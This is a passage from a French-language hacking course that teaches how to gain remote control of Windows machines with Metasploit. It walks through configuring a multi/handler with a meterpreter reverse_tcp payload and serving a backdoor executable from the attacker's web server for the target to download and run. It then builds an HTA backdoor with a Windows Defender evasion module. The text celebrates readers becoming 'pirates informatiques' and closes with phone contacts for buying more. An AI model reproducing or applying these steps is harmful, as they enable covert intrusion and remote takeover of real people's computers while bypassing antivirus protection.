 Nous voyons que le « LHOST » est vide or il doit contenir notre adresse ip
« ifconfig » comme dans la création de notre backdoor ci-dessus :
 Pour le changer ou le remplir nous devons mettre cette
commande « set lhost + ip (votre ip ; exemple mon ip est le
10.10.1.2 cela équivaut à mettre : set lhost 10.10.1.2) ».
 Nous voyons que le port est le port par défaut or nous avons mis un port
« lport » lorsque nous étions dans la création de notre backdoor.
 Pour changer cela nous devons mettre la commande suivante :
« set lport + le port que nous avons mis lors de la création de
notre backdoor »

 Pour exécuter notre écoute nous allons mettre la commande suivante :


 La commande : « run ou exploit ».

NB : Cette configuration est faite avant le lancement du « backdoor » et son


exécution par la cible.

Maintenant allons exécuter le backdoor comme la cible le ferais pour simuler une
attaque réel avec piratage qui se fera comme dans un cas réel
 ALLONS sur notre machine cible « Windows 7 ou 8 ou 10 » mais :
 Il faut désactiver les pare-feu
 Mettre la machine dans le même réseau que kali « soit réseau
nat ou accès par pont selon ce que vous avez mis dans kali »
GSIMEL : HACKING PENETRATION SYSTÈME
53
jftsavoir@gmail.com
 ALLONS dans le navigateur de la cible :
Une fois dans le navigateur de votre cible, vous allez tapez ceci : « http://ip de kali/nom du
backdoor que vous avez créé avec son extension. »
Exemple : « http://10.10.1.17/backdoorgsi1.exe » voici comment transférer et télécharger
le backdoor dans la machine cible facilement, voilà pourquoi il faut envoyer le backdoor
dans le dossier « var/www/html » et également activer le service apache2 depuis le
début.

Vous enregistrez le « backdoor » sur le bureau.


 Exécutons le « backdoor » : allons sur notre machine kali. Vous allez
percevoir « une session » et un « meterpreter ». Cela veut dire que
vous venez de pirater la machine x64 bites que vient d’exécuter
votre « backdoor ».

Nous allons vérifiez si nous avons bien piraté la machine :

GSIMEL : HACKING PENETRATION SYSTÈME


54
jftsavoir@gmail.com
Pour sortir de la session tapez : background
BIENVENU A TOUS. VOUS ETES MAINTENANT DES PIRATES INFORMATIQUES. CE SONT
LA LES PRATIQUES LES PLUS UTILISES MEME PAR LES EXPERTS. VEUILLEZ VRAIMENT
MAITRISER, FAIRE ET REFAIRE LES PRATIQUES.

NOUS PASSONS A LA MEME PRATIQUE AVEC UN BACKDOOR EN HTA :


 Commençons par créer un backdoor en hta avec « evasion » :

 Nous allons tout d’abord chercher « evasion » sur msfconsole,


 Une fois cette panoplie de module d’evasion s’affiche nous allons
utiliser le module qui a pour indice « 6 » ou pour
nom « evasion/Windows/windows_defender_js_hta ».
Pour l’utilisation d’un module mettez soit « use + l’indice du module, dans notre cas
« use 6 » » ou « use + le nom complet du module ».
Une fois utilisée nous constatons que nous sommes en payload x64 donc piratage des
architectures x64.
Passons à la configuration :

GSIMEL : HACKING PENETRATION SYSTÈME


55
jftsavoir@gmail.com
 Affichez les options avec la commande : « options »
 Changez le nom de la sortie du backdoor avec la commande : « set filename
+nom » que vous souhaitez mais il faut que l’extension soit en hta. Exemple :
gsi.hta»
 Changez le port du backdoor avec la commande : « set lport + le port que vous
voulez »
 Tapez « set lhost +votre ip ». Exemple : (set lhost 10.10.1.17).
 Puis exécutez la sortie avec la commande : « run ou exploit »
 Changez l’emplacement du backdoor pour le télécharger facilement chez la cible
en l’envoyant dans le dossier « var/www/html ».
Une fois les étapes fini nous allons maintenant allez sur notre multi/handler pour la
configuration de l’écoute du port.
Pour ceux qui ont mis background pour continuer tapez ceci :
 Nous tapons « use multi/handler »
 Comme la configuration a été fait au préalable en payload x64 ou si vous avez
supprimé tout mettez ceci : « set payload
Windows/x64/meterpreter/reverse_tcp »
 Puis tapez « options »
 En suite pour ceux qui ne sont pas sortie du terminal tapez ceci :
 « set lport + le nouveau port que vous avez mis lors de la création du
backdoor ». Exemple si j’ai mis sur le backdoor un port 650, je tape :
(set lport 650) »
 Puis exécuter avec « run »
Pour ceux qui ont tout effacé tapez ceci :
 Nous tapons « use multi/handler »

GSIMEL : HACKING PENETRATION SYSTÈME


56
jftsavoir@gmail.com
 Mettez ceci : « set payload Windows/x64/meterpreter/reverse_tcp »
 Puis tapez « options »
 Tapez : « set lport + le nouveau port que vous avez mis lors de la
création du backdoor. Exemple si j’ai mis sur le backdoor un port 650,
je tape : (set lport 650) »
 Mettez « set lhost +ip ». Exemple : set lhost 10.10.1.17
 Puis exécuter avec « run »

Une fois la configuration faite nous allons sur notre machine Windows cible :
Dans le navigateur de la cible puis mettons « http://ip de kali / le nom donner lors de la
configuration du backdoor en hta. » exemple : « http://10.10.1.17/gsi.hta ».

Exécuter Le Backdoor.

GSIMEL : HACKING PENETRATION SYSTÈME


57
jftsavoir@gmail.com
Une fois le backdoor exécuté nous allons sur notre kali pour voir si nous avons « une
session » et que nous avons « un meterpreter » ce qui voudra dire que la machine a été
piratée.

Nous venons de pirater avec un autre type de backdoor une machine Windows. Nous
pouvons vérifier la machine avec la commande : « sysinfo ».
Nous venons d’apprendre à pirater une machine avec un backdoor.
Mais savez-vous qu’il existe une méthode de piratage qui ne nécessite pas que la cible
exécute quoi que ce soit et que vous aurez une session meterpreter sur la machine ?
Donc piraté la cible sans avoir besoin de sa collaboration.

GSIMEL : HACKING PENETRATION SYSTÈME


58
jftsavoir@gmail.com
POUR ACHAT :

WHATSAPP : +225 0173715172

CONTACTS : +225 0173847278

GSIMEL : HACKING PENETRATION SYSTÈME


59
jftsavoir@gmail.com

Vous aimerez peut-être aussi